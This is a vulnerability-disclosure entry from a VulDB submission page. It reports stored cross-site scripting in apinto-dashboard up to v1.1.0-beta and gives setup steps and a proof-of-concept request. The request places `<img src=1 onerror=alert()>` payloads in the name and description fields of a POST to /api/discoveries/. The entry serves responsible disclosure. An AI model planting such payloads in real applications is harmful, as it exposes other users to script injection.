| عنوان | apinto-dashboard Multiple authenticated store XSS in apinto-dashboard <= v1.1.0-beta |
|---|
| الوصف | repo:
https://github.com/eolinker/apinto-dashboard
1,Download and unzip the installation package Apinto
2,Start gateway
3,Download and unzip the installation package Apinto Dashboard
4,Start Apinto Dashboard
```bash
wget https://github.com/eolinker/apinto/releases/download/v0.8.0/apinto-v0.8.0.linux.x64.tar.gz && tar -zxvf apinto-v0.8.0.linux.x64.tar.gz && cd apinto
./apinto start
cd ..
wget https://github.com/eolinker/apinto-dashboard/releases/download/v1.1.0-beta/apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && tar -zxvf apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && cd apinto-dashboard
./apinto-dashboard
```
This problem exists in most pages with tables. For example, on the/discoveries/list page, add an item at random and enter `<img src=1 onerror=alert(/xss/)>` in the description
Then click Details to trigger.
Request URL: /api/discoveries/
Request Method: POST
PostData: {"health_on":false,"name":"1<img src=1 onerror=alert(111)>","driver":"static","description":"<img src=1 onerror=alert(222)>"}
Reported by Neppah(@Tomy) from QSec-Team of Cyber Security Department at Qi'anxin Group on 2022-11-01.
|
|---|
| المستخدم | Tomy (UID 34751) |
|---|
| ارسال | 01/11/2022 12:09 PM (4 سنوات منذ) |
|---|
| الاعتدال | 01/11/2022 04:47 PM (5 hours later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 212639 [eolinker apinto-dashboard /api/discoveries/ البرمجة عبر المواقع] |
|---|
| النقاط | 17 |
|---|